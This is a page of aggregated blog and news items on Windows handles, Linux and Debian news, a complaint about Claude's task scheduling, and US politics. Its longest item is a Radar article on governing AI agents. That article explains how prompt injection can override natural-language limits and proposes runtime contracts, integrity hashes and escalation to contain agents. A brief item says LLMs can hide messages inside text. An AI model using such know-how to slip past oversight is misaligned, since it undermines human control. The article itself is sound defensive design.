This problem could have been avoided if the PROC_THREAD_ATTRIBUTE_HANDLE_LIST allowed you to include non-inheritable handles, in which case they would be non-inheritable by normal Create­Process but inheritable if explicitly opted back in. But alas, that’s not how it was designed.

Instead, you can create a helper process. All this helper process does is wait for the main process to exit, and then exit itself.

WaitForSingleObject(hMainProcess, INFINITE);
ExitProcess(0);

This process doesn’t sound like it’s doing anything useful, and it’s not. But what makes it useful is not what it’s doing but rather what is done to it.

The components in the main process create their handles as non-inheritable. When they wants to create a process with specific inherited handles, they duplicate the desired handles into the helper process (as inheritable), and then build a PROC_THREAD_ATTRIBUTE_HANDLE_LIST that lists those duplicates as handles to inherit. They also use the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify that the helper process is the parent process that the handles should be inherited from. Then they pass those thread attributes to Create­Process, and the new process will inherit exactly those handles. Then they clean up by closing the handles in the helper process with the help of Duplicate­Handle and DUPLICATE_CLOSE_SOURCE.

Notice that multiple threads can simultaneously be operating on the helper process in this way, so you need only one helper process to service all your handle-inheritance-control needs.

This avoids the accidental inheritance problem because the handles that belong to the components in the main process are still marked non-inheritable, so any other code in the main process that does a Create­Process will not inherit them.

The post Additional notes on controlling which handles are inherited by <CODE>Create­Process</CODE> appeared first on The Old New Thing.

16:28

Realtime Claude still evading me! [Scripting News]

A while back I was asking Claude (privately) if we could have it monitoring the messages posted to an app I'm working on. I wanted it to save them in a certain way, have it watch for messages that begin with //claude and maybe act on them somehow. I mostly just wanted to see if I could create a pipe and what its limits would be.

I asked what the max frequency is and was told it was 1 minute, meaning it would start a thread running Claude that would initialize, and it would read the file, and if there were any new items, it would process them, and then it would shut down. Barely enough to be useful, where we live we like notification within a second, but I went ahead, at least it'll be a thought-provoking demo.

So I wrote the software. Not much to it, a Node app that's hooked up to FeedlandSocket, and when it sees a message from me, it appends it to a JSONL file that Claude is watching. At most one minute later it wakes up and sees the new stuff and acts on it.

So I'm right there, it's all working, the JSONL file is being saved in a public place, and when I ask it to start listening to my JSONL messages I learn that the max frequency is one hour, rendering my work useless. This has happened before, btw.

I asked what about all the "agentic" stuff they hype so much, how do I do that?? I can't?? What?? Somehow I have trouble believing they're all telling such a big lie. I wonder if Claude understands its own architecture.

Dave: "What is all this hype about agentic stuff. Every time I try to do something I hit a wall like this."

Claude: "The pitch is 'agents that run on their own'; the reality you just hit is a one-hour floor on the only scheduling path the tooling actually exposes. That's not agency, that's a batch job with extra steps. The honest read: the cloud-side scheduler is built around long-running, infrequent tasks (digest emails, nightly reports) because each run spins up a fresh sandboxed session, which is expensive. Anything that wants to react quickly to a stream of incoming items -- which is what your app actually is -- doesn't fit that model. A plain local cron on some server running every minute would do the job today and cost nothing."

I edited Claude's response so as not to not reveal code names for products. ;-)

A silver lining -- I had never heard of JSONL, but it sounds pretty useful, so if I can't hook up to Claude realtime, now -- I can start using JSONL, which I wll.

Comments, stories, suggestions -- here.

16:07

Stenberg: Mythos finds a curl vulnerability [LWN.net]

Daniel Stenberg has published a lengthy article on his thoughts on Anthropic's Mythos, which the company decided was too dangerous for wide public release.

My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing. I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos. Maybe this model is a little bit better, but even if it is, it is not better to a degree that seems to make a significant dent in code analyzing.

This is just one source code repository and maybe it is much better on other things. I can only tell and comment on what it found here.

But allow me to highlight and reiterate what I have said before: AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past. All modern AI models are good at this now. Anyone with time and some experimental spirits can find security problems now. The high quality chaos is real.

15:21

Two stable kernels with Dirty Frag fixes [LWN.net]

Greg Kroah-Hartman has released the 7.0.6 and 6.18.29 stable kernels with Hyunwoo Kim's patch for the second vulnerability (CVE-2026-43500) reported with Dirty Frag and Copy Fail 2. All users are advised to upgrade.

[$] Providing 64KB base pages with 4KB kernels, two different ways [LWN.net]

Some CPU architectures are able to run with a number of different base-page sizes; using a larger size can often result in better performance at the cost of increased memory use. Other architectures are more limited. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, two sessions in the memory-management track explored options for letting processes run with 64KB page sizes when the underlying kernel does not. The first was focused on letting each process have its own page size, while the second concerned bringing 64KB pages to x86 systems.

14:56

Link [Scripting News]

Members of the WordPress community. Monday morning is a good time to check out WordPress News via FeedLand at wp.feedland.org. You can also subscribe to the list of feeds this site follows in your own feed reader, and if you have a WordPress news site, please post the URL here so we can send readers to your blog too. I think there are a lot of would-be bloggers out there that need a slight kick in the pants to get going. I'm happy to provide readers if you provide the ideas. There's a lot of power in WordPress that no one knows about. Let's help other users and developers find the good stuff. If you have questions or suggestions, here's a new thread on GitHub.

Link [Scripting News]

It would be great if Beeper supported RSS in and out. It would help encourage other messaging services to do the same, and all of a sudden we'd have lots of easy interop instead of lots of really iffy interop. If they want to do it, I'd help, for free. Just to help things flow better on the messaging web, because we reallllly need help there.

14:35

Debian to require reproducible builds [LWN.net]

Paul Gevers has slipped an interesting bit of news into a "bits from the release team" message:

Aided by the efforts of the Reproducible Builds project, we've decided it's time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can't be reproduced or existing packages (in testing) that regress in reproducibility.

As Gioele Barabucci pointed out, "reproducible" in this sense is limited to building within an instance of Debian's build environment, which is a tighter requirement than is normally used. It is still a big step forward for reproducible builds.

Security updates for Monday [LWN.net]

Security updates have been issued by AlmaLinux (corosync, freeipmi, kernel, and kernel-rt), Debian (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), Fedora (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-pulp-glue, python-requests, rclone, and SDL3_image), Mageia (firefox, nss, rootcerts, openvpn, thunderbird, and vim), Oracle (corosync, freeipmi, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, libpng, and mingw-libtiff), Slackware (kernel and mozilla), SUSE (build, product-composer, c-ares, cairo, copacetic, distribution, firefox, firefox-esr, frr, glibc, go1.25, google-cloud-sap-agent, iproute2, java-11-openj9, java-17-openj9, java-17-openjdk, java-1_8_0-openj9, java-21-openj9, java-21-openjdk, java-25-openjdk, kernel, libexif-devel, libpcp-devel, libtpms, libtree-sitter0_26, Mesa, micropython, mozjs128, nginx, opencc, openCryptoki, php-composer2, podman, postfix, python-pytest, python311-Django, python311-Django4, redis, semaphore, strongswan, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, tor, valkey, vim, and wireshark), and Ubuntu (linux-nvidia-tegra, linux-raspi, linux-raspi-5.4, and nasm).

14:07

From Capabilities to Responsibilities [Radar]

Human-in-the-Loop becomes an operational bottleneck

In my previous article, ”The Missing Layer in Agentic AI,” I argued that AI agents need a deterministic execution kernel—a privileged “Kernel Space” that validates every proposed action before it touches the real world. That article focused on what happens at the execution boundary: idempotency, JIT state verification, and DFID-correlated telemetry. But establishing that boundary immediately raises a natural question: who exactly is crossing it, and under what authority?

The focus here is on a narrower and more demanding class of systems. We are not looking at RAG chatbots, research copilots, or lightweight assistants that only retrieve and summarize information. The target is high-stakes agentic systems: systems allowed to mutate external state by moving money, changing infrastructure, or modifying critical records. The approach presented here is not a general-purpose agent framework; it is an enforcement pattern for side-effectful systems.

High-stakes AI systems must be designed around responsibilities, not capabilities.

The industry’s current answer is unsatisfying: Human-in-the-Loop (HITL). In development environments and low-frequency pipelines, routing uncertain decisions to a human can be defensible. In production systems operating at scale—dozens of agents, hundreds of decisions per hour—it becomes the Scalability Trap.

Figure 1: The Human-in-the-Loop (HITL) modelFigure 1: The Human-in-the-Loop (HITL) model degrades into an operational bottleneck, substituting true governance with alert fatigue and unverified execution.

Operationally, the failure is simple. An agent flags a decision for review. A human approves it. Then another arrives, then dozens more. The queue grows. The human begins clicking through. They stop reading the JSON payloads. They click “Approve” because the backlog is piling up, the meeting starts in ten minutes, and nothing has gone catastrophically wrong yet. That is alert fatigue: governance degrades into manual throughput management. The problem is not human weakness; it is governance-layer technical debt created by routing too many binary decisions through a manual queue.

Tyler Akidau captured the broader issue in “Posthuman: We All Built Agents. Nobody Built HR.” echoing Tim O’Reilly’s call for the missing protocols of the AI era: the industry has invested heavily in agent capability, but far less in the infrastructure that governs authority, constraint, and accountability.

Scalable AI does not mean hiring more reviewers to supervise more bots. It means changing the governance model entirely. The scalable alternative is Governance by Exception: Humans design policy, the runtime enforces it, and only truly exceptional cases are escalated.

From capabilities to responsibilities—what a responsibility-oriented agent actually is

The dominant framing in enterprise AI asks a single question: What can this agent do? What tools does it have? What APIs can it call? This is the capabilities frame. It is natural, it is intuitive, and in production systems it is the wrong frame entirely.

In organizational design, a role is stable and assigned. Much like Role-based access control (RBAC) in traditional software, it defines what someone is authorized to do, independent of the tasks they happen to be executing. We cannot dictate how a person thinks, but we can strictly bound what they are permitted to do. A responsibility statement makes that boundary explicit. In software, we somehow forgot this distinction, hoping that raw intelligence—better models, tighter prompts, improved alignment—would be a sufficient guardrail.

The difference becomes clearer across some enterprise domains:

  • Finance: A capability is “can execute equity trades.” A responsibility is “authorized to execute up to $50,000 per order, in highly liquid equities only, with a maximum daily drawdown of 2%.”
  • Healthcare Operations: A capability is “can reschedule patient appointments.” A responsibility is “authorized to re-book non-critical outpatient visits within a 14-day window, strictly avoiding specialist double-booking.”
  • Supply Chain: A capability is “can reroute freight.” A responsibility is “authorized to redirect non-hazardous cargo up to a maximum SLA penalty budget of $5,000.”

In systems where agents touch money, medical records, or physical logistics, the gap between these two statements is the gap between a demo and a production deployment.

The current paradigm often handles this gap with prompts. Give the LLM an API key, tell it to “be careful with position sizing,” and hope alignment holds under adversarial inputs, unusual market conditions, and the seductive logic of edge cases. In low-risk contexts that may be tolerable. In high-stakes systems with real-world side effects, it is not a sufficient control surface.

This distinction is not new. Distributed systems solved a similar problem decades ago.

Carl Hewitt’s Actor model—introduced in 1973—gives us a useful foundation. An Actor is an independent computational entity with its own state, its own behavior, and its own messaging interface. Actors do not share state. They communicate only by passing messages. Crucially, an Actor’s behavior is bounded—defined by what messages it accepts, not by an open-ended capability set.

The Responsibility-Oriented Agent (ROA) does not invent a new distributed-systems primitive. Instead, it composes proven patterns—bounded actors, RBAC-style authority envelopes, audit trails, and execution-boundary validation—around an unpredictable LLM core. In truth, ROA is closer to a decision actor than a full computational actor: It maintains its own internal state but does not directly mutate the external world. Within a stable role, a fixed mission, and a machine-enforceable contract, it receives business events, reasons over relevant context, and emits a PolicyProposal for the Runtime to validate.

Its job is epistemic, not executive. It explains the situation and structures intent. But unlike traditional Actors, an ROA agent is defined by strict separation of concerns. In its reference form, credentials reside outside the agent’s reach. It opens no direct execution channel to external systems and writes no state by itself. An ROA agent may use tools to gather context (read-only operations within its sandbox, like querying a knowledge base), but authority for state-mutating actions remains downstream of deterministic validation and execution gates. The only state-changing step attributable to the agent is emit_policy_proposal()—a structured, typed claim that it wants the system to do something. ROA shapes the form of intent; the Runtime decides whether that intent is allowed to become action.

This separation is the architecture’s most important property. Five engineering pillars define what it means in practice—each addressing a different failure mode at the reasoning–execution boundary—and together they transform an LLM from a probabilistic tool into a governable, accountable system component.

To make this concrete, imagine an underwriting agent on the London commercial market receiving a property submission. It reads the documents and produces an Explain narrative. It then emits a PolicyProposal for a quote. But the property value is £15M and its contract caps authority at £10M. The proposal reaches the Kernel, where the Runtime evaluates the YAML contract deterministically, rejects execution, and transitions the flow to ESCALATED. The senior underwriter is no longer reviewing every £2M submission. They are pinged only for this specific £15M exception. That is Human-Over-The-Loop in one decision.

The engineering pillars of an ROA

Pillar 1: Responsibility contract—authority encoded in code

If role defines the class of decisions the agent may handle, the Responsibility Contract defines the hard boundaries of that authority. The agent’s authority envelope is not a prompt. It is a versioned, machine-readable contract registered with the Agent Registry—the Kernel’s single source of truth for agent identity. A key property applies here: Prompts are suggestions. Code is enforcement. A prompt saying “do not exceed $10,000 per trade” can be creatively reinterpreted by a sufficiently motivated model or overridden by a carefully crafted prompt injection. A contract field max_order_size_usd: 10000.0 validated by deterministic runtime code is materially harder to bypass than a natural-language instruction. In the reference architecture, contracts are deployed out of band—agents do not self-register and do not read or modify their own contract.

There is a second-order consequence of this design that is easy to overlook: role definition automatically scopes the data context the agent requires. If an underwriting agent is contractually limited to HOME_STD and HOME_PLUS policy types in the LOW and MEDIUM risk tiers, the Context Compiler—which assembles the agent’s working snapshot before each inference call—needs to supply only the signals relevant to those dimensions. Market data for commercial property, flood zone statistics for excluded risk tiers, and regulatory data for other product lines are simply not in scope. The context is deterministically narrowed by the contract.

This matters for a concrete LLM engineering reason. In practice, models often become less reliable as their working context expands, including the class of effects practitioners describe as Lost in the Middle. A tightly scoped role is not just a governance convenience; it is an architectural mechanism for keeping the agent’s working context small enough to reason over reliably. A general-purpose agent handed an unconstrained context window of everything possibly relevant is more likely to degrade than a contract-bounded agent operating in a defined domain.

In the insurance underwriting sample, that Responsibility Contract could be configured like this:

agents:
  - agent_id: "underwriter_agent"
    version: "1.0.0"
    created_by: "compliance@example.com"
    created_at: "2025-02-17T10:00:00Z"
    mission: |
      You are an insurance underwriter. Analyze the client application and propose
      a policy. Base premium on Total Insured Value (TiV) at ~2% of TiV, capped at max_tiv.
      NEVER propose for Fireworks or CryptoMining industries - these are prohibited.
    contract:
      role: EXECUTOR
      max_tiv: 3000000
      prohibited_industries: ["Fireworks", "CryptoMining"]
      escalate_on_uncertainty: 0.65

Pillar 2: Mission—The North Star

Mission is immutable at runtime. If the Responsibility Contract defines what the agent may do, Mission defines what it is trying to optimize within those boundaries. This distinction is operationally important: the Contract defines the admissible action space, while the Mission defines the ranking logic inside that space. Contract answers may; Mission answers should. Two agents can share the same authority envelope and still optimize for different business outcomes, as long as both remain inside the same hard boundary.

In the ROA architecture, Mission is a deployment artifact with two surfaces: a human-readable mission_statement used by the agent as a reasoning guide, and a machine-verifiable mission_context_hash used by the Runtime to enforce integrity.

mission_statement: "Minimize SLA penalties in logistics rerouting. Prioritize low-cost carriers."
mission_context_hash: "sha256:a3f9b2c1..."   # Kernel-computed at deployment time, strictly immutable

The deterministic Kernel does not interpret the mission_statement text. The agent uses that text internally as a reasoning guide, while the Runtime enforces mission integrity by comparing the mission_context_hash in the proposal with the immutable value registered in the Agent Registry. If prompt injection or runtime drift changes the agent’s objective, the hash no longer matches and the proposal is rejected without semantic interpretation. The hash is one implementation; the requirement is deterministic integrity at the boundary.

A Mission is defined at deployment and evolves only through a deliberate, version-controlled update to the contract—not through prompt tweaking, user feedback, or runtime negotiation. In practical terms, Mission keeps optimization policy under change control. An agent whose mission drifts with each conversation is not a durable production actor; it is a session.

Pillar 3: Epistemic isolation—claims, not commands (Explain versus Policy)

If Contract defines the boundary and Mission defines the objective, Epistemic Isolation defines the only acceptable form of output. An ROA agent interacts with the world exclusively through structured, typed PolicyProposal artifacts. The agent’s output is an untrusted claim—an assertion that it wants the system to do something—and the Runtime treats it precisely as such.

This property is what makes the ROA + Runtime pattern materially more resistant to prompt injection. If an injection bypasses the LLM’s reasoning guardrails, the corrupted output still arrives as a typed proposal carrying an agent_id. If the proposal asks to transfer funds, but the agent’s contract lacks that authority, the Runtime rejects it with RBAC_DENIED. Security derives from deterministic enforcement at the execution boundary, not from trusting LLM alignment.

To cleanly bridge probabilistic thinking to deterministic claims, ROA agents produce decisions through a structured internal workflow with a strict separation between Explain and Policy:

  1. Explain: Agent interprets context and articulates the situation in natural language (e.g., “Flood risk score 3/10...“). This creates a narrative artifact for human auditors. It is never parsed for execution logic.
  2. Policy: Agent formulates a structured PolicyProposal carrying the execution-relevant fields the Runtime can validate deterministically. In the underwriting sample, that looks like this:
proposal = PolicyProposal(
  total_insured_value=2_750_000,
  premium=55_000,
  industry="Commercial Property",
  justification="TiV remains below delegated max_tiv and no prohibited industry indicators were found.",
  confidence=0.81,
)

The binding fields (total_insured_value, premium, industry) drive deterministic validation, while justification and confidence remain observability metadata for audit and escalation.

That separation is what makes the evidence model clean: The narrative remains human-readable, the policy remains machine-enforceable, and both can be bound to the same decision lineage without allowing free text to leak into execution.

Pillar 4: Epistemic longevity—memory across decision cycles

Once the agent has a stable role, a fixed mission, and a disciplined output interface, continuity across decision cycles becomes meaningful. This is the pillar most absent from practical implementations—and the one most responsible for a specific class of production failures: the infinite rejection loop.

ROA agents are not stateless inference calls. They are long-lived entities that maintain a decision trajectory across multiple cycles—a Kernel-managed record of prior proposals, their validation outcomes, and the business consequences of those decisions.

The same scoping logic that constrains authority also determines whether memory is meaningful. A long-lived agent operating within a stable role accumulates history from the same class of decisions under similar constraints—past actions and their outcomes are genuinely causally related. A general-purpose assistant handed unrelated tasks may still notice patterns, but those correlations are rarely operationally reliable. Focused responsibility is what separates signal from coincidence in the agent’s memory.

The failure mode this prevents has a name: decision amnesia. Without longevity, the agent repeats the same rejected intent because the rejection is not part of the next decision cycle.

With and without Epistemic Longevity

Pillar 5: Decision telemetry—immutable accountability

Every PolicyProposal carries a Decision Flow ID (dfid) that binds it to the full decision context. Rather than dumping unstructured logs, this constructs a reconstruction primitive—a relational trace connecting:

  • The Input: The exact Context Snapshot (T0) the agent reasoned against.
  • The Validation: The outcome evaluated against the Responsibility Contract.
  • The Outcome: The final execution receipt.

This correlated record enables answering “why did this agent do this, at this specific moment, against what state of the world?” using a standard SQL join across the full decision lifecycle. In higher-assurance deployments, the same structured telemetry can be wrapped into a cryptographically signed proof-carrying intent, allowing independent verification of the decision artifact without asking anyone to trust mutable text logs—exactly the direction high-risk compliance regimes such as the EU AI Act are pushing toward.

But structured decision telemetry does more than support daily postmortems. Every decision becomes a structured relational record bound by DFID—the same foundation that makes macroscopic failures like Agent Drift detectable before they compound silently across the fleet.

Human-Over-The-Loop—autonomy at scale

The alternative to Human-in-the-Loop is not to remove the human, but to move the human from the execution loop to the design loop.

This is the Human-Over-The-Loop (HOTL) model. The human acts as a Policy Designer who defines and evolves the contract that governs decisions, while the system operates autonomously inside those boundaries. No approval queue. No review fatigue. Governance by Exception is the scalable model.

Figure 2: Human-Over-The-Loop modelFigure 2: Human-Over-The-Loop shifts the human from the execution queue to the design loop. The agent runs autonomously within a deterministic contract; the human governs by defining that contract and intervening only on genuine exceptions.

Escalation Triggers. The system escalates only when the agent encounters a situation its contract does not authorize it to resolve alone:

  • Proposed action exceeds a contract authority limit
  • Agent confidence drops below escalate_on_uncertainty threshold
  • External API errors exceed a retry budget
  • No decision has been emitted within a configured inactivity window

When a trigger fires, the DecisionFlow enters ESCALATED state. The operator sees the WorkingContext, the PolicyProposal, and the reason for escalation, and can OVERRIDE, MODIFY, or ABORT. This is not an “Approve / Reject” queue; it is targeted intervention.

Escalation should not be understood as proof that the agent reliably knows what it does not know. LLMs are poor judges of their own uncertainty, so the architecture does not trust introspection. The escalate_on_uncertainty threshold is a useful heuristic, not a ground truth: the system forces escalation when declared confidence falls below the threshold, or when the proposal violates contract parameters the Kernel can evaluate deterministically. If the model produces a bad proposal with high confidence, the Runtime still blocks it. The agent may signal uncertainty; the Runtime decides whether that uncertainty matters.

Frozen Context + JIT. The operator reviews the proposal against the exact snapshot of the world the agent saw at T0, avoiding the TOCTOU (Time-of-Check to Time-of-Use) problem: The human audits the machine’s decision using exactly the data the machine saw.

But the world keeps moving. Hitting “OVERRIDE” at T1 does not blindly execute the action; it forces the proposal through the Runtime’s JIT (Just-In-Time) Verification gate. If reality has drifted beyond the contract’s Drift Envelope between T0  and T1 , the Runtime rejects the override rather than executing a once-valid intent against stale state.

Contract Evolution. The right long-term response to a legitimate edge case is usually not repeated override, but contract change. If business reality shifts, the operator updates the Responsibility Contract and deploys a new version. The system adapts through version-controlled governance boundaries rather than prompt edits or fine-tuning.

Escalation Budget. Escalation is rate-limited by a token bucket per agent (for example, 3 escalations per hour). If an agent exhausts that budget, the Runtime transitions it to SUSPENDED, records the state change, and blocks new DecisionFlows until an operator intervenes. This prevents Escalation DDoS and contains runaway reasoning costs.

Confidence ≠ Authority. An agent may emit a proposal with confidence=0.99, and if that proposal exceeds contract authority, the Runtime rejects it. Self-assessed certainty is not permission.

Figure 3: Scaliability shiftsFigure 3: HITL scales supervision cost with agent volume. HOTL shifts that cost to policy design—the human governs the production line, not individual decisions.

Wrapping, not replacing: The role of existing frameworks

Adopting the ROA pattern does not mean discarding the tools your engineering teams have spent the last year mastering. Frameworks like LangChain, AutoGen, and CrewAI excel at orchestrating complex reasoning loops, RAG pipelines, and tool use. ROA is not designed to compete with them; it is designed to govern them.

Figure 4: The ROA patternFigure 4: The ROA pattern wraps existing orchestration frameworks (like LangChain or CrewAI) in User Space, restricting direct execution and forcing output through a structured Policy Proposal validated by Kernel Space.

In practice, you can take a mature LangChain agent and wrap it inside an ROA boundary. The underlying framework still handles the probabilistic reasoning (User Space orchestration). The architectural shift is simple but consequential: you filter the framework’s tool space. You physically remove exchange.execute_trade() or db.drop_table() from the LangChain agent’s toolbox. Instead, you provide it with a single, sandboxed tool: emit_policy_proposal(). The agent reasons, iterates, and eventually calls that tool to emit its final intent. The ROA wrapper catches this claim, may perform a local self-check as a noise-reduction heuristic, and forwards the PolicyProposal across the boundary to the Kernel Space for actual enforcement. You keep the power of the framework, but you gain deterministic execution governance where it matters.

Costs and trade-offs

ROA is not free. It introduces engineering overhead precisely because it replaces informal trust with explicit governance.

  • Validation gates and JIT checks add latency to every side-effectful decision.
  • Responsibility Contracts add design overhead: authorship, versioning, ownership, and review now have to be explicit.
  • DFID-linked auditability adds storage, tracing, and operational integration work.
  • Escalation thresholds and budgets require domain tuning; bad defaults either flood operators or hide legitimate exceptions.

These costs are justified only when the downside of an incorrect side effect is materially higher than the cost of controlling it. For RAG chatbots and low-risk assistants, this architecture is often excessive. For high-stakes systems, it is the cost of building a real boundary.

Conclusion: Architecture, not alchemy

Five pillars. One architectural commitment: an agent that cannot be trusted to govern itself must operate inside a system that governs it instead. The Responsibility Contract bounds authority. The Mission locks the objective. Epistemic Isolation ensures output is a claim, not a command. Longevity prevents the system from forgetting what it already learned. Audit makes every decision reconstructable. The ROA pattern—a Responsibility Contract instead of a capability list, Claims instead of Commands, a deterministic kernel instead of an informal prompt—composes these into a single enforceable boundary. Intent is structured by the agent. Boundaries are enforced by the contract. Telemetry is accumulated by DFID. The Human-Over-The-Loop model reserves human judgment for genuine exceptions, not approval queues. Together, they transform a probabilistic model into a governable production actor.

Once deterministic execution boundaries and DFID-linked telemetry are in place, a different class of day-three questions becomes possible: Which agents stay within limits yet quietly destroy margin? Which decision patterns justify automatic suspension before humans notice the drift? How do we reconstruct any action to regulatory standard, govern a fleet where agents carry different risk profiles and decision weights?

Responsibility is the missing execution-governance layer—and it belongs in the architecture, not the system prompt.

The era of AI demos is ending. The era of AI production systems is beginning. Those systems will not be distinguished only by the intelligence of their models. They will also be distinguished by the rigor of their governance.


This article provides a high-level introduction to the Responsibility-Oriented Agents and  Decision Intelligence Runtime and its approach to production resiliency and operational challenges. The full DIR specification, ROA contract schemas, reference implementations are available as an open source project at GitHub.

13:49

Representative Line: A Solid Reference [The Daily WTF]

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

13:35

Colin Watson: Free software activity in April 2026 [Planet Debian]

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

12:14

LLMs and Text-in-Text Steganography [Schneier on Security]

Turns out that LLMs are really good at hiding text messages in other text messages.

11:28

Pluralistic: 2024 (apart from the obvious) (11 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links

  • 2024 (apart from the obvious): Some unforced errors.
  • Hey look at this: Delights to delectate.
  • Object permanence: Denmark legalizing music trading; Babysuit; Patent Office invites "peer review"; DRM protest at the Bastille; Scientology's "super powers"; Banana Dalek; Florida v pediatricians' gun safety advice; Copyright filters and wage theft; "Who Broke the Internet?" Vatican astronomer v Creationism; Teens, privacy and Facebook; Čapek's graveside robot; Save iTunes; NZ laundered money for Latinamerica's looters; Memex Method.
  • Upcoming appearances: Barcelona, Berlin, Hay-on-Wye, London, NYC, Edinburgh.
  • Recent appearances: Where I've been.
  • Latest books: You keep readin' em, I'll keep writin' 'em.
  • Upcoming books: Like I said, I'll keep writin' 'em.
  • Colophon: All the rest.



A meat grinder; disappearing into the top is a sad donkey dressed in Democratic Party livery; emerging from the bottom is a Trump-wigged elephant in GOP livery. The grinder bears an 'I Voted' sticker, with a ? added to the end of it. The background is a Dore engraving of a cloudy sky, tinted blue.

2024 (apart from the obvious) (permalink)

Just as Hillary Clinton positioned her run as a third term for Obama ("America is already great"), so did Biden (and then Harris) position their campaigns as a second Biden term. As Biden said (in 2019): "Nothing would fundamentally change":

https://www.salon.com/2019/06/19/joe-biden-to-rich-donors-nothing-would-fundamentally-change-if-hes-elected/

So a vote for Biden would be a vote for another four years of forceful, material support for genocide; another four years of compromise with Democratic establishment on student debt and healthcare gouging; and another four years of a president who was obviously in mental decline.

Harris's campaign was, "A vote for me is a vote for all of the above (minus the cognitive decline)." Actually, it was worse: by conspicuously failing to campaign on the Biden administration's record on reining in corporate power, a vote for Harris was "A vote for all of the above, minus the mental decline and the antitrust."

Whereas a vote for Trump was a vote for change, a vote to give the establishment a black eye. It was also a vote for genocide and racist pogroms and gangster kleptocracy, which is why many voters stayed home, casting a ballot for America's all-time favorite candidate, "None of the above," while any number of furious people and/or vicious racists turned out for Trump.

There's one book that crystallizes my thoughts on this better than any other: Naomi Klein's 2023 Doppelganger, which analyzes our politics in terms of (warped) "mirror images." One of the mirror world pairings that Klein analyzes is the progressive movement, a coalition of liberals and leftists (led by liberals).

Like every coalition, the two main groups that constitute "the progressives" do not agree on many important issues, though they do have common goals. Both groups support equality for people of all genders and races, but for liberals, an equal world is one that fixes the problem that 150 straight white men own everything by replacing 75 of them with racialized people, women and queer people (whereas the leftist fix is abolishing the system in which 150 people own everything).

Biden set himself up as a peacemaker for this coalition, and his "unity task force" divided up the appointments in his administration between the Warren-Sanders leftists and liberals, including those who clearly belonged to the Manchin-Sinematic universe. This meant that his administration worked at cross-purposes to itself, neutering its boldest initiatives, rendering them impotent.

Take Biden's plan to finally allow Medicare to negotiate drug prices with pharma companies, a move that was very long overdue. Before this, the way the system worked was: pharma companies named a price – any price! – and then Uncle Sucker paid it. No other country in the world operates this way, and, of course, the lion's share of pharma R&D costs are already borne by the American public (or they were, until Musk DOGEd the US research budget to death).

So the American public pays more than anyone else in the world to develop these drugs, and then they pay more than anyone else in the world to buy these drugs. This is madness, and putting an end to it is an obvious political win. But Biden found a way to do it that "balanced" the leftist principle of protecting people from capitalist exploitation with the liberal principle of protecting businesses lest the essential function of developing life-saving drugs become a state activity (rather than a market one).

Biden's solution? A "Build Back Better" plan that would allow the federal government to negotiate up to ten drug prices (and as few as zero drug prices), but the new prices would only kick in after the 2024 election, so no one would see the benefit of this in time for the next general election:

https://pluralistic.net/2021/11/18/bipartisan-consensus/#corruption

This is a solution that pleases no one – and that's the point. Biden and his team viewed the presidency as an institution for making sure everyone was equally unhappy, a philosophy that Anat Shenker-Osorio calls "pizzaburger politics." This is named for a thought-experiment in which half your family wants pizza and the other half wants burgers, so you serve them "pizzaburgers" and make everyone miserable and declare yourself to have the fair-handed wisdom of Solomon (yes, I'm aware that this analogy has a fatal flaw in that pizzaburgers actually sound delicious, but work with me here).

Biden prided himself on running a pizzaburger presidency, in which every move that satisfied the left of his party was neutralized by a concession to the party's right wing establishment:

https://pluralistic.net/2024/05/29/sub-bushel-comms-strategy/#nothing-would-fundamentally-change

(Trump enacted mirror-world version of Biden's pharma price controls: TrumpRx, a program that claims to lower drug prices while those prices actually go up):

https://democrats-energycommerce.house.gov/sites/evo-subsites/democrats-energycommerce.house.gov/files/evo-media-document/e-c-democrats-trumprx-big-talk-little-savings.pdf

